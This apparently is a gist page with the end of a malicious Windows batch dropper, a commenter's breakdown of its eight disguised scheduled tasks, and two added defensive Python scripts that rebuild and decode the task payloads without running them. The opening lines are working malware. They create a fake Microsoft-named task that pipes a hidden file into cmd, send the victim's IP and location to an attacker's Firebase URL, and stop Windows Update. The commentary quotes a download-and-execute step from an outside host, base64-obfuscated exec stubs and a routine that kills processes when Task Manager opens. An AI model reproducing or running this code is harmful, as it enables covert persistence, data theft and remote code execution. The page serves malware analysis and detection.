schtasks /create /xml "C:\systemfile\temp7.xml" /tn "\Microsoft\Windows\Shell\ObjectTask" /F
Del "C:\systemfile\temp7.xml"
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp8.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp8.xml
echo ^<RegistrationInfo^> >> C:\systemfile\temp8.xml
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp8.xml
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp8.xml
echo ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp8.xml
echo ^<URI^>\Microsoft\Windows\Clip\ServiceCleanup^</URI^> >> C:\systemfile\temp8.xml
echo ^</RegistrationInfo^> >> C:\systemfile\temp8.xml
echo ^<Triggers^> >> C:\systemfile\temp8.xml
echo ^<LogonTrigger^> >> C:\systemfile\temp8.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml
echo ^<Delay^>PT5M^</Delay^> >> C:\systemfile\temp8.xml
echo ^</LogonTrigger^> >> C:\systemfile\temp8.xml
echo ^</Triggers^> >> C:\systemfile\temp8.xml
echo ^<Principals^> >> C:\systemfile\temp8.xml
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp8.xml
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp8.xml
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp8.xml
echo ^</Principal^> >> C:\systemfile\temp8.xml
echo ^</Principals^> >> C:\systemfile\temp8.xml
echo ^<Settings^> >> C:\systemfile\temp8.xml
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp8.xml
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp8.xml
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp8.xml
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp8.xml
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp8.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp8.xml
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp8.xml
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp8.xml
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp8.xml
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp8.xml
echo ^</Settings^> >> C:\systemfile\temp8.xml
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp8.xml
echo ^<Exec^> >> C:\systemfile\temp8.xml
echo ^<Command^>cmd^</Command^> >> C:\systemfile\temp8.xml
echo ^<Arguments^>/c more "C:\systemfile\c.z" ^| cmd ^& if EXIST "C:\Windows\security\pywinvera\libs" (schtasks /delete /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F)^</Arguments^> >> C:\systemfile\temp8.xml
echo ^</Exec^> >> C:\systemfile\temp8.xml
echo ^</Actions^> >> C:\systemfile\temp8.xml
echo ^</Task^> >> C:\systemfile\temp8.xml
schtasks /create /xml "C:\systemfile\temp8.xml" /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F
Del "C:\systemfile\temp8.xml"
FOR /F "tokens=*" %a in ('curl.exe -L http://ip-api.com/json') do SET widget=%a
set widget=%widget:"=\"%
set widget=%widget: =_%
echo %widget%
curl.exe -X POST -d "%widget%" https://ping-newdatabase-default-rtdb.firebaseio.com/Userinfo.json
sc.exe stop wuauserv
sc.exe config wuauserv start=demand
OptionalM commented Apr 9, 2022

Most of Stage 3 defines 8 tasks in "Task Scheduler". I've put the other stuff at the top here, even though some tasks are defined in earlier lines.

Line 1 kills this script instantly if your WinSystemLocale does not start with "en-".

Lines 5-6 make a directory called C:\systemfile and hide it. You can still open it by hitting "Win + R" and entering "C:\systemfile". The files inside are also hidden.

Lines 148-193 create 3 files inside C:\systemfile

Lines 357-359 make sure that curl is available. From the attacker's repo, but clean as of now.

Lines 596-603 send the user's IP to the attacker's firebase. It's safe to run 596-600 locally to see the data that you sent. It includes the IP and an approximate location down to city and ZIP code.

Lines 608/609 stop wuauserv (= Windows Update Service) and set it to start only manually. This seems to actually be the default. But you can start it by running sc.exe start wuauserv and set it to start on its own by selecting an option from <boot|system|auto|demand|disabled|delayed-auto> and running sc.exe config wuauserv start=<your option>

Tasks

Task 1 (lines 14-63): \Microsoft\Windows\AppID\VerifiedCert

cmd.exe /c more c.z | cmd & more %USERPROFILE%\Downloads\c.z | cmd

This is run inside C:\systemfile.

This Task seems to execute what's inside C:\systemfile\c.z and then %USERPROFILE%\Downloads\c.z?
Is it common to pipe more into cmd?

Task 2 (lines 75-132): \Microsoft\Windows\Application Experience\Maintenance

This tries to find the path to Chrome, Brave or Edge and then calls it with the following arguments:

<chrome> --tyqe=render --fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072 --lang=en-US --extension--process --origin--trial-disabled--features=SecurePaymentConfirmation --device-scale--factor=1 --num--raster-threads=2 --profile-directory=Default --enable--main-frame-before--activation www.google.com --renderer--client-id=6 --user-data-dir="C:\systemfile" --no-v8--untrusted-code-mitigations --load-extension="C:\systemfile" --mojo--platform-channel-handle=-3784 /prefetch:1

This is run inside C:\systemfile

This runs a browser. With the user data in C:\systemfile. Probably hidden? Haven't checked the flags all out yet.

Task 3 (lines 233-273): \Microsoft\Windows\Services\CertPathCheck

python -c "import base64;exec(base64.b64decode('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'))"

This is run inside C:\Windows\security\pywinvera

Decoded:

import os, base64
 
Str = list(open("C:\\systemfile\\obs.log", mode="r", encoding="utf-8").read().replace("\n", "")) 
for x in range(len(Str)):
    Str[x] = chr(ord(Str[x]) - 1) 
 
exec(base64.b64decode("".join(Str)))
os.popen('schtasks /end /tn \Microsoft\Windows\Services\CertPathw')
os.popen('TASKKILL /F /FI "SESSION eq 0" /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T')
exit()

Reads obs.log, does a b64 decode and executes it. It stops Task 4 and kills browser chrome and other processes running with session 0 ("user-less").

Task 4 (lines 279-319): also \Microsoft\Windows\Services\CertPathw

pythonw -c "import base64;exec(base64.b64decode('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'))"

This is run inside C:\Windows\security\pywinvera

import autoit, os
autoit.auto_it_set_option("WinWaitDelay", 0)
autoit.win_wait('[REGEXPTITLE:(?i)(.*Process Explorer.*|.*Task Manager.*|.*System Explorer.*|.*Process Hacker.*|.*AnVir Task.*|.*WinUtilities.*)]')
os.popen('TASKKILL /F /FI "SESSION eq 0" /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T')
exit()

This script waits until the Task Manager or similar tool is started and then kills the hidden processes to hide them from the user.

Task 5 (lines 365-410): \Microsoft\Windows\Servicing\ComponentCleanup

cmd curl https://autobat[.]alexrybak0444[.]workers[.]dev/ -o %temp%\c4329f-4b8b33e-fa4fffe0

Download file from site and put it into %temp%\c4329f-4b8b33e-fa4fffe0.
As of right now this file only contains the placeholder text asd.

Task 6 (lines 419-465): \Microsoft\Windows\Servicing\ServiceCleanup

cmd /c type %temp%\c4329f-4b8b33e-fa4fffe0 | cmd && del %temp%\c4329f-4b8b33e-fa4fffe0

Runs the script downloaded in Task 5, then deletes it.

Task 7 (lines 478-520): \Microsoft\Windows\Shell\ObjectTask

cmd /c if exist %temp%\c4329f-4b8b33e-fa4fffe0 (SCHTASKS /End /TN "\Microsoft\Windows\AppID\VerifiedCert" & SCHTASKS /End /TN "\Microsoft\Windows\Application Experience\Maintenance" & schtasks /change /tn "\Microsoft\Windows\AppID\VerifiedCert" /DISABLE & schtasks /change /tn "\Microsoft\Windows\Application Experience\Maintenance" /DISABLE & schtasks /change /tn "\Microsoft\Windows\AppID\VerifiedCert" /ENABLE & schtasks /change /tn "\Microsoft\Windows\Application Experience\Maintenance" /ENABLE)

If the file downloaded in Task 5 exists, it stops Task 1 and Task 2, disables them and then enables them again.

Task 8 (lines 535-577): \Microsoft\Windows\Clip\ServiceCleanup

cmd /c more "C:\systemfile\c.z" | cmd  & if EXIST "C:\Windows\security\pywinvera\libs" (schtasks /delete /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F)

Runs the contents of C:\systemfile\c.z and deletes this task if C:\Windows\security\pywinvera\libs exists.
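The eight tasks above are all written the same way: each XML element is echoed with cmd.exe caret escapes into a temp file, the file is registered with schtasks /create /xml under a Microsoft-looking name, and the file is deleted. A triage script that replays those echo lines and parses the result gives the table of commands, logon types and name/URI mismatches that the comment above worked out by hand. The following is an added example written for this page, not code from the gist or from its commenter; the sample input is a constructed excerpt modelled on tasks 1 and 3, with the redacted base64 blob replaced by a placeholder. It handles the plain echo-to-file form that all eight task bodies use; the conditionally echoed <Command> line of task 2 is out of scope.

```python
"""Rebuild and triage the Task Scheduler XML that the Stage 3 dropper above
writes with caret-escaped ``echo`` lines.

Added example for this page, not code from the gist or from its commenter.
"""
import re
import xml.etree.ElementTree as ET

ECHO_RE = re.compile(r'^\s*echo (.*) (>>?) "?([^" ]+)"?\s*$')
CREATE_RE = re.compile(r'schtasks /create /xml "([^"]+)" /tn "([^"]+)"', re.I)
# Interpreters the dropper hides behind Microsoft-looking task names.
INTERPRETERS = {'cmd', 'python', 'pythonw', 'curl', 'powershell'}


def cmd_unescape(s):
    """cmd.exe: '^' quotes the next character ('^<' -> '<', '^|' -> '|', '^%' -> '%')."""
    return re.sub(r'\^(.)', r'\1', s)


def rebuild_files(script):
    """Replay the echo redirections and return {path: reconstructed contents}."""
    files = {}
    for line in script.splitlines():
        m = ECHO_RE.match(line)
        if m:
            payload, op, path = m.groups()
            text = cmd_unescape(payload) + '\n'
            files[path] = text if op == '>' else files.get(path, '') + text
    return files


def triage_task(name, xml_text):
    """Summarise one task and flag the traits a defender would key on."""
    # The declaration claims UTF-16 but echo wrote the console code page, so
    # drop it; the dropper also echoes raw '&' into text nodes, which a strict
    # XML parser rejects, so escape bare ampersands before parsing.
    body = re.sub(r'^\s*<\?xml[^>]*\?>', '', xml_text)
    body = re.sub(r'&(?![A-Za-z#]\w*;)', '&amp;', body)
    root = ET.fromstring(body)
    for el in root.iter():                      # drop the task namespace
        el.tag = el.tag.split('}', 1)[-1]

    def get(path):
        return (root.findtext(path) or '').strip()

    trig = root.find('Triggers')
    info = {
        'registered_as': name,
        'uri': get('RegistrationInfo/URI'),
        'author': get('RegistrationInfo/Author'),
        'logon_type': get('Principals/Principal/LogonType'),
        'triggers': [] if trig is None else [t.tag for t in trig],
        'command': get('Actions/Exec/Command'),
        'arguments': get('Actions/Exec/Arguments'),
    }
    base = re.sub(r'\.exe$', '', info['command'].lower().rsplit('\\', 1)[-1])
    flags = []
    if info['author'] == 'Microsoft Corporation' and base in INTERPRETERS:
        flags.append('claims Microsoft authorship but runs a generic interpreter')
    if info['uri'] and info['uri'].lower() != name.lower():
        flags.append('registered name differs from the embedded URI')
    if re.search(r'\|\s*cmd\b', info['arguments']):
        flags.append('pipes a file into cmd: script text run from a non-.bat file')
    if info['logon_type'] == 'S4U':
        flags.append('S4U logon: non-interactive, runs in session 0')
    if root.find('Principals/Principal/UserId') is None:
        flags.append("no <UserId>: runs as the registering user; id='LocalService' is only a label")
    if not info['triggers']:
        flags.append('no trigger: started on demand by another task or process')
    info['flags'] = flags
    return info


def analyse(script):
    """Triage every task XML the script builds, in the order it builds them."""
    names = dict(CREATE_RE.findall(script))
    return [triage_task(names.get(path, '?'), xml)
            for path, xml in rebuild_files(script).items()
            if xml.lstrip().startswith('<?xml')]


# Constructed excerpt modelled on tasks 1 and 3 above (elements collapsed onto
# fewer lines; the redacted base64 blob is a placeholder).
SAMPLE = r'''echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp.xml
echo ^<RegistrationInfo^>^<Author^>Microsoft Corporation^</Author^>^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^>^</RegistrationInfo^> >> C:\systemfile\temp.xml
echo ^<Triggers^>^<LogonTrigger^>^<Delay^>PT68S^</Delay^>^</LogonTrigger^>^</Triggers^> >> C:\systemfile\temp.xml
echo ^<Principals^>^<Principal id="LocalService"^>^<LogonType^>S4U^</LogonType^>^</Principal^>^</Principals^> >> C:\systemfile\temp.xml
echo ^<Actions Context="LocalService"^>^<Exec^>^<Command^>cmd.exe^</Command^> >> C:\systemfile\temp.xml
echo ^<Arguments^>/c more c.z ^| cmd ^& more ^%USERPROFILE^%\Downloads\c.z ^| cmd^</Arguments^>^</Exec^>^</Actions^>^</Task^> >> C:\systemfile\temp.xml
schtasks /create /xml "C:\systemfile\temp.xml" /tn "\Microsoft\Windows\AppID\VerifiedCert" /F
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp3.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp3.xml
echo ^<RegistrationInfo^>^<Author^>Microsoft Corporation^</Author^>^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^>^</RegistrationInfo^> >> C:\systemfile\temp3.xml
echo ^<Principals^>^<Principal id="LocalService"^>^<LogonType^>S4U^</LogonType^>^</Principal^>^</Principals^> >> C:\systemfile\temp3.xml
echo ^<Actions Context="LocalService"^>^<Exec^>^<Command^>python^</Command^>^<Arguments^>-c ^"import base64;exec(base64.b64decode('REDACTED'))^"^</Arguments^>^</Exec^>^</Actions^>^</Task^> >> C:\systemfile\temp3.xml
schtasks /create /xml "C:\systemfile\temp3.xml" /tn "\Microsoft\Windows\Services\CertPathCheck" /F
'''

if __name__ == '__main__':
    for task in analyse(SAMPLE):
        print(task['registered_as'], '->', task['command'], task['arguments'])
        print('   flags:', '; '.join(task['flags']))
```

On a live host the same checks can be run against schtasks /query /xml output for each of the eight task names listed in the comment; the name/URI mismatch and the interpreter-behind-a-Microsoft-author pattern are the cheapest signals to hunt for.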
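Tasks 3 and 4 wrap their real payload twice: the task argument is a python -c "import base64;exec(base64.b64decode('...'))" stub, and the stage it unpacks (decoded in the comment above) reads C:\systemfile\obs.log, strips newlines, shifts every character down by one code point and only then base64-decodes and exec's it. The decoder below peels both layers for static review without executing anything. It is an added example for this page, not code from the gist or its commenter; the page redacts the real base64 blob and obs.log never appears in it, so both inputs here are constructed stand-ins built by the inverse routine.

```python
"""Peel the two wrapper layers used by tasks 3 and 4 above, without exec().

Added example for this page, not code from the gist or from its commenter.
"""
import base64
import re

# Matches the single-quoted blob inside exec(base64.b64decode('...')).
WRAPPER_RE = re.compile(r"base64\.b64decode\('([A-Za-z0-9+/=]+)'\)")


def unwrap_b64_exec(arg):
    """Layer 1: return the source hidden in a python -c exec(b64decode(...)) argument."""
    m = WRAPPER_RE.search(arg)
    if not m:
        raise ValueError('no base64 exec wrapper found')
    return base64.b64decode(m.group(1)).decode('utf-8')


def decode_obs_log(text):
    """Layer 2: strip newlines, shift each char by -1, then base64-decode."""
    shifted = ''.join(chr(ord(c) - 1) for c in text.replace('\n', ''))
    return base64.b64decode(shifted)


def encode_obs_log(payload, width=76):
    """Inverse of decode_obs_log; used here only to build a constructed obs.log."""
    b64 = base64.b64encode(payload).decode('ascii')
    shifted = ''.join(chr(ord(c) + 1) for c in b64)
    return '\n'.join(shifted[i:i + width] for i in range(0, len(shifted), width)) + '\n'


def peel(arg, obs_log):
    """Return both recovered stages as text for review; nothing is executed."""
    return {'stage1': unwrap_b64_exec(arg),
            'stage2': decode_obs_log(obs_log).decode('utf-8')}


# Constructed stand-ins for the redacted stage 1 blob and for obs.log.
STAGE1_SRC = "import os, base64\nprint('stage 1 would read obs.log here')\n"
STAGE1_ARG = '-c "import base64;exec(base64.b64decode(\'%s\'))"' % (
    base64.b64encode(STAGE1_SRC.encode()).decode())
STAGE2_SRC = b"print('stage 2 would run here')"
OBS_LOG = encode_obs_log(STAGE2_SRC)

if __name__ == '__main__':
    for stage, src in peel(STAGE1_ARG, OBS_LOG).items():
        print(f'--- {stage} ---\n{src}')
```

Because the shift is applied to base64 text, the stored obs.log contains characters just outside the base64 alphabet (for example '{' for 'z' and '>' for '='), which is a usable file-content signature on its own.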
